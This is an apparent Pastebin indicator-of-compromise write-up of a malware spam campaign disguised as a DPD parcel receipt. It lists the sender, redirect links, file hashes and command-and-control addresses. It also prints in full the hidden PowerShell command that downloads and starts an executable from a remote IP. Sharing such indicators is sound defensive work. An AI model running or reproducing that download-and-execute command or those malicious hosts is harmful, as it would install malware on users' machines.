Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SENDER:
- adriana.frasure.5248@hotmail.com
- SUBJECT:
- DPD e-service: Carriere you have new receipt #5905220254
- LINK:
- http://bit.ly/2BJ2mLv ->
- http://556131[.]canadaservicetd.com/inv/19354667/480266839 ->
- http://dl.dropboxusercontent.com/s/y9b6nuojqa42v8b/package_receipt_940012650941854636376.zip
- ZIP DELIVERED:
- 1efe980c7c594f088265d9f27b24edbb (package_receipt_940012650941854636376.zip)
- JS IN ZIP:
- 643fba70526ac7586e80a17b19721f19 (package_receipt_023396501534971627860.js)
- POSH CALLOUT:
- http://185.213.208.103/forum.php?KWDJrXB
- DROPS / RUNS RoamingDsh83.exe:
- powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://185.213.208.103/forum.php?KWDJrXB','%USERPROFILE%\AppData\RoamingDsh83.exe'); sTart-procesS '%USERPROFILE%\AppData\RoamingDsh83.exe'
- PAYLOAD:
- 1c5de35eb197140bb03cd165c18da3cb (RoamingDsh83.exe)
- C2:
- 37.220.31.120:443
- 89.223.29.34:443
- 89.223.26.215:443
- checkbox.bit:443
Add Comment
Please, Sign In to add comment